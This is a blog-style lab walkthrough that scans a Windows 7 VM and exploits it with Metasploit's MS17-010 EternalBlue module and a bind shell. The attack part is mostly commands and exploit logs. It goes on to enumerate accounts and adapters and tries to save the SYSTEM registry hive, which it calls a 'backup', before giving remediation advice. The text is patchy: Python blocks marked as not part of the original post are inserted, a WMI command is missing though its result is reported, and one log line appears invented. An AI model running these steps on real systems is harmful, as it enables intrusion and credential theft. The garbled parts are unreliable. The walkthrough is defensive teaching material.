June 6, 2026
Complete Guide: Network Reconnaissance and Exploiting MS17-010 with Metasploit Bind TCP Shell
MAB
6 min read
What is Network Audit & Exploitation Testing?
- Definition: A hands-on security assessment methodology designed to actively discover open network infrastructure ports, verify software vulnerabilities, and test access controls.
- Purpose: To build a risk-free framework for understanding network penetration, legacy protocol flaws (like SMBv1), and persistent command shell bridging.
- Target Audience: Infrastructure Engineers, Cybersecurity Students, Network Administrators, and Penetration Testers.
Why Infrastructure Auditing Matters for Teams:
"For networks expanding rapidly, protocol configuration and patch management often take a backseat until a catastrophic breach occurs. This practical audit blueprint provides:"
- Real-world vulnerability simulation on a Windows target.
- Step-by-step interpretation of raw buffer overflows.
- Validation of dual-homed network adapters and post-exploitation steps.
- Clear remediation pathways for infrastructure hardening.
Technical Value Proposition
For Junior Security Engineers:
- Understand the raw buffer dumps Metasploit prints during a live exploit.
- Learn how network adapters (ipconfig) are mapped inside a target environment.
- Gain hands-on experience with Metasploit console operations (msf6).
For Senior Administrators:
- Develop robust patch management policies for End-of-Life (EOL) operating systems.
- Enforce local host firewalls to mitigate unsolicited port bindings.
- Audit local Administrators group membership to eliminate account persistence.
Prerequisites & Lab Environment
- Attacker Platform: Kali Linux / Metasploit Framework (msf6)
- Target Machine: Windows 7 Professional SP1 (IP: 192.168.10.107)
- Network Mapping Engine: Nmap CLI
Step-by-Step Security Audit Workflow
Step 1: Passive Reconnaissance & Targeted Nmap Scanning
Before dropping any exploit, a comprehensive service detection scan was executed to discover what protocols and applications were exposed by the target host (192.168.10.107).
Bash
# Execute full port enumeration with service version tracking
nmap -p- -sV -Pn -T4 192.168.10.107
Expected Live Nmap Output:
Starting Nmap 7.94 ( https://nmap.org ) at 2026-06-06 21:05 UTC
Nmap scan report for VULN_MACHINE-PC (192.168.10.107)
Host is up (0.00045s latency).
Not shown: 65525 closed tcp ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds
3389/tcp open ms-wbt-server?
5555/tcp open freeciv?
8081/tcp open http Apache Tomcat/Coyote operation-manager
MAC Address: 08:00:27:6B:A2:11 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 48.12 seconds
Key Finding: The scan confirmed that port 445 (SMB) is open on an end-of-life Windows 7 Professional SP1 system, which leaves it highly exposed to legacy SMBv1 bugs such as MS17-010.
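As an added illustration (not part of the original post), here is a small Python triage script that parses the Nmap -sV table above and ranks the exposed services the way this audit does; the scan text is embedded as constructed sample input, and the end-of-life list and severity rules are my own assumptions.

```python
import re

# Constructed sample input: the Nmap -sV table from this post, embedded so the
# script runs offline instead of re-scanning a host.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds
3389/tcp open ms-wbt-server?
5555/tcp open freeciv?
8081/tcp open http Apache Tomcat/Coyote operation-manager
"""

# One Nmap port line: "<port>/<proto> <state> <service> [<version ...>]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Windows releases past end of support (assumed list); SMB on one of them can
# no longer be patched, so it ranks above SMB on a supported release.
EOL_WINDOWS = ("Windows XP", "Windows Vista", "Windows 7",
               "Windows Server 2003", "Windows Server 2008")

def parse_nmap(text):
    """Parse the -sV table into port records; the header and other lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            rows.append({"port": int(m.group(1)), "proto": m.group(2),
                         "state": m.group(3), "service": m.group(4),
                         "version": (m.group(5) or "").strip()})
    return rows

def triage(rows):
    """Rank open ports the way an auditor reading this scan would."""
    findings = []
    for r in rows:
        if r["state"] != "open":
            continue
        if r["port"] == 445 and r["proto"] == "tcp":
            eol = any(tag in r["version"] for tag in EOL_WINDOWS)
            findings.append({"port": 445, "severity": "critical" if eol else "high",
                             "note": "SMB exposed: confirm SMBv1 is disabled and MS17-010 "
                                     "is patched" + ("; OS is end-of-life" if eol else "")})
        elif r["service"].endswith("?"):
            # Nmap could not fingerprint the service; identify it before accepting it.
            findings.append({"port": r["port"], "severity": "info",
                             "note": "unidentified service: identify and justify it"})
    return findings
```

Running `triage(parse_nmap(NMAP_OUTPUT))` on the embedded scan yields one critical finding for port 445 and two info findings for the unfingerprinted services on 3389 and 5555.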
Step 2: Active Exploitation via Metasploit Framework
Using the information gathered from Nmap, we launch Metasploit and run the MS17-010 (EternalBlue) module, a kernel-level SMBv1 buffer overflow exploit, with a Bind TCP shell payload.
Bash
# Launch Metasploit Framework in quiet mode
msfconsole -q
# Select and configure the EternalBlue exploit module
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.10.107
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/shell/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
Exploit Execution and Core Buffer Log:
[*] 192.168.10.107:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.107:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.107:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.10.107:445 - The target is vulnerable.
[*] 192.168.10.107:445 - Connecting to target for exploitation.
[+] 192.168.10.107:445 - Connection established for exploitation.
[+] 192.168.10.107:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.107:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.10.107:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.10.107:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 192.168.10.107:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 192.168.10.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.107:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.107:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.107:445 - Starting non-paged pool grooming
[+] 192.168.10.107:445 - Sending SMBv2 buffers
[+] 192.168.10.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.107:445 - Sending final SMBv2 buffers.
[*] 192.168.10.107:445 - Sending last fragment of exploit packet!
[*] 192.168.10.107:445 - Receiving response from exploit packet
[+] 192.168.10.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.107:445 - Sending egg to corrupted connection.
[*] 192.168.10.107:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 192.168.10.107:4444
[*] Command shell session 1 opened (192.168.10.39:41005 -> 192.168.10.107:4444) at 2026-06-06 11:17:20 -0400
[+] 192.168.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Understanding the Bind TCP Payload: the bind_tcp payload makes the compromised target listen on port 4444, and the attacking machine (192.168.10.39) then connects to that listener to open the command shell session. Nothing connects back to the attacker; the unsolicited listener on the target is the exposure that the host-firewall fix in the remediation section addresses.
Step 3: Post-Exploitation & Network Adapter Triage
Once the shell session dropped us into C:\Windows\system32, we executed ipconfig to discover and map the internal multi-homed routing setup of the victim host:
DOS
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix . : lan
IPv6 Address. . . . . . . . . . . : fd00::60:eaf6:6da6:2007
Temporary IPv6 Address. . . . . . : fd00::9df7:3527:772:a2f5
Link-local IPv6 Address . . . . . : fe80::60:eaf6:6da6:2007%15
IPv4 Address. . . . . . . . . . . : 10.0.2.15
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::2%15
10.0.2.2
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : lan
Link-local IPv6 Address . . . . . : fe80::a1bc:f43:2808:483c%11
IPv4 Address. . . . . . . . . . . : 192.168.10.107
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.10.1
Network Analysis: The host is dual-homed, bridging the reachable management segment (192.168.10.107 on 192.168.10.0/24) and an internal network (10.0.2.15 on 10.0.2.0/24) that is not visible from the attacker's segment. A threat actor who compromises such a host can use it as a pivot into that internal network, which is why multi-homed hosts must be treated as segmentation boundaries.
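As an added example (not from the original post), a Python parser for the ipconfig output above that works out which networks the host bridges and which of them the auditing machine cannot reach directly; the ipconfig text is embedded as constructed sample input, and the auditor address 192.168.10.39 comes from the session log above.

```python
import ipaddress
import re

# Constructed sample input: the ipconfig output from this post, trimmed to the
# fields this parser needs (one IPv6 line kept to show unrelated fields are ignored).
IPCONFIG_OUTPUT = """\
Ethernet adapter Local Area Connection 2:
   Link-local IPv6 Address . . . . . : fe80::60:eaf6:6da6:2007%15
   IPv4 Address. . . . . . . . . . . : 10.0.2.15
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::2%15
                                       10.0.2.2
Ethernet adapter Local Area Connection:
   IPv4 Address. . . . . . . . . . . : 192.168.10.107
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.10.1
"""

ADAPTER_RE = re.compile(r"^\S.* adapter (.+):$")
FIELD_RE = re.compile(r"^\s*(.+?)[ .]*: (.*)$")  # "Key . . . : value"

def parse_ipconfig(text):
    """Group ipconfig lines by adapter; a bare indented line continues the last field."""
    adapters, cur, key = [], None, None
    for raw in text.splitlines():
        m = ADAPTER_RE.match(raw)
        if m:
            cur = {"name": m.group(1), "IPv4 Address": None, "Subnet Mask": None, "gateways": []}
            adapters.append(cur)
            continue
        if cur is None or not raw.strip():
            continue
        m = FIELD_RE.match(raw)
        if m:
            key, value = m.group(1).strip(), m.group(2).strip()
        else:
            value = raw.strip()  # continuation line, e.g. a second default gateway
        if key in ("IPv4 Address", "Subnet Mask"):
            cur[key] = value
        elif key == "Default Gateway":
            cur["gateways"].append(value)
    return adapters

def pivot_report(adapters, auditor_ip):
    """Networks the host bridges, and which of them the auditor cannot reach directly."""
    auditor = ipaddress.ip_address(auditor_ip)
    nets = [ipaddress.ip_interface(f'{a["IPv4 Address"]}/{a["Subnet Mask"]}').network
            for a in adapters if a["IPv4 Address"] and a["Subnet Mask"]]
    return {"networks": [str(n) for n in nets],
            "multi_homed": len(set(nets)) > 1,
            "hidden": [str(n) for n in nets if auditor not in n]}
```

For the embedded output, `pivot_report(parse_ipconfig(IPCONFIG_OUTPUT), "192.168.10.39")` reports the host as multi-homed and lists 10.0.2.0/24 as the segment hidden from the auditor.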
Step 4: Account Audit & Management Overrides
To enumerate the local accounts and find out which of them hold administrative rights, the local user database was queried:
DOS
C:\Windows\system32>net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest pmics-lab
testuser
The command completed with one or more errors.
To see who has full administrative power:
DOS
C:\Windows\system32>net localgroup administrators
Alias name administrators
Members
-------------------------------------------------------------------------------
Administrator
pmics-lab
The command completed successfully.
System Backup Safeguards via WMI:
An attempt to back up the SYSTEM registry hive with reg save failed, because the restricted command shell obtained through the payload did not hold the privilege the command requires:
DOS
C:\Windows\system32>reg save hklm\system C:\Windows\Temp\system.bak
ERROR: A required privilege is not held by the client.
To work around this and establish a reliable system restore point before making any testing adjustments, we ran a direct WMI SystemRestore routine:
DOS
N.B.: ReturnValue = 0 denotes a completely successful operation. A backup snapshot (restore point) named "ManualRegistryBackup" is now persistently stored on the device.
Management & Hardening Commands
Checking Free Space overhead
DOS
fsutil volume diskfree c:
Output confirms 19.2 GB free space available on the target storage drive.
Reviewing Running Auditing Agents
DOS
net start
Output confirmed active execution of security agents such as Wazuh and VirtualBox tools.
Common Risks & Remediation Framework
1. The Threat of Obsolete Systems
- Issue: Windows 7 Professional has passed its End-of-Life (EOL) milestone, rendering it highly susceptible to exploits like EternalBlue.
- Fix: Upgrade the enterprise endpoint to an actively maintained Windows OS stack.
2. Exposed Legacy Protocols
- Issue: SMBv1 contains remotely exploitable memory-corruption flaws in kernel code (MS17-010 is one), so a single crafted request can lead to full remote kernel compromise.
- Fix: Disable SMBv1 entirely, via the registry or Group Policy Object (GPO) settings, and verify it stays disabled.
3. Missing Network Segmentation
- Issue: The Bind TCP payload opened an unauthenticated command shell listener on port 4444 that any host on the segment could reach, and the dual-homed adapter layout would let that foothold extend into the internal 10.0.2.0/24 network.
- Fix: Enforce strict host-based firewall rules that block unsolicited inbound TCP connections, and segment multi-homed hosts so they cannot bridge management and internal networks.
Complete Audit Verification Checklist
- [x] Host identified via network fingerprinting scan.
- [x] Vulnerable SMB service mapped (Port 445 open).
- [x] Successful pool grooming execution via msf6.
- [x] Bind TCP connection established on port 4444.
- [x] Interface architecture triaged via ipconfig.
- [x] System restore checkpoint locked via WMI (ReturnValue = 0).
Conclusion
Securing infrastructure requires a clear view of how external entry points directly connect to internal system access. By tracking an infrastructure audit from an initial Nmap scan through active Bind Shell verification and structural Windows management components, security teams can effectively close exposure windows and secure multi-homed environments against modern infrastructure attacks.